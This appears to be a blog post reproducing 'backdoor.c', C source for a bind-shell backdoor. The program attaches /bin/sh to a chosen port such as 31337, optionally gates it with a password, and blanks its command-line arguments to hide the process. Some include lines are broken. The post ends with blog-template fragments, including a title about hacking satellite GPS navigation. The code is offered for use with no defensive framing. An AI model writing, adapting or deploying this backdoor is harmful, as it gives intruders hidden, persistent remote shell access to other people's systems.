/* backdoor.c by jsbach@bear.cs.zorg.edu.
that dup2() shit was ripped from pluvius@io.org.
compiles fine on *BSD*, linux, and solaris (on solaris -lsocket)
.. to hide the process i strcpy("", argv[count]);, making it invisible
on solaris and pretty inconspicuous on BSD and linux.
basically, this binds a program to a specified port and listens
for a connection. when you exit the program, you DON'T get dropped
to a shell, so you can let people bounce telnet connections off
your box but not access anything else, or whatever.
Example usage:
./backdoor /bin/sh 31337 p@55w0rd &
or
./backdoor /bin/sh 31337
*/
#define DATA "Hello. Please place semicolons after commands in shell mode :P\n---\n"
#include
#include
#include
#include
int sockfd, count, clientpid, socklen, serverpid, temp, temp2,temp3;
struct sockaddr_in server_address;
struct sockaddr_in client_address;
main(int argc, int **argv)
{
char password[ sizeof( argv[3] ) ];
char passwordchk[ sizeof( argv[3] ) ];
count=0;
if (argc < 3) {
printf("usage: %s program_to_run port_number password(optional)\n",argv[0]);
exit(-1);
}
if (argc == 4)
{
strcpy((char *)&password, argv[3]);
strcpy((char *)argv[3], "");
}
printf("\n-----\nDaemon running %s on port %d. PID is %d.\n-----\n",argv[1], atoi(argv[2]), getpid());
sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); /*add error checking*/
bzero((char *) &server_address, sizeof(server_address));
strcpy((char *)argv[0],"");
server_address.sin_family=AF_INET;
server_address.sin_port=htons(atoi(argv[2]));
strcpy((char *)argv[2],"");
server_address.sin_addr.s_addr=htonl(INADDR_ANY);
bind(sockfd, (struct sockaddr *)&server_address, sizeof(server_address));
listen(sockfd, 5);
signal(SIGHUP, SIG_IGN);
while(1)
{
socklen=sizeof(client_address);
temp=accept(sockfd, (struct sockaddr *)&client_address,&socklen);
if(argc == 4)
{
while(1)
{
write(temp, "Password: ", 10);
read(temp, &passwordchk, sizeof(password));
if(strncmp(passwordchk, password, sizeof(password)) == 0)
break;
bzero(passwordchk,sizeof(passwordchk));
}
}
write(temp, DATA, sizeof(DATA));
if (temp < 0) exit(0);
clientpid=getpid();
serverpid=fork();
if (serverpid != 0)
{
dup2(temp,0); dup2(temp,1); dup2(temp,2);
execl(argv[1],argv[1],(char *)0);
}
close(temp);
}
}
Tuesday, February 21, 2017
pretty inconspicuous
Subscribe to:
Posts (Atom)
Satellite hacking Intel 1 (BACK@WAR CyberArmy friends let´s start Satellite GPS navigation hack IT WILL HV A PRICE)
https://stackoverflow.com/questions/63010812/how-to-access-http-port-5001-from-public-internet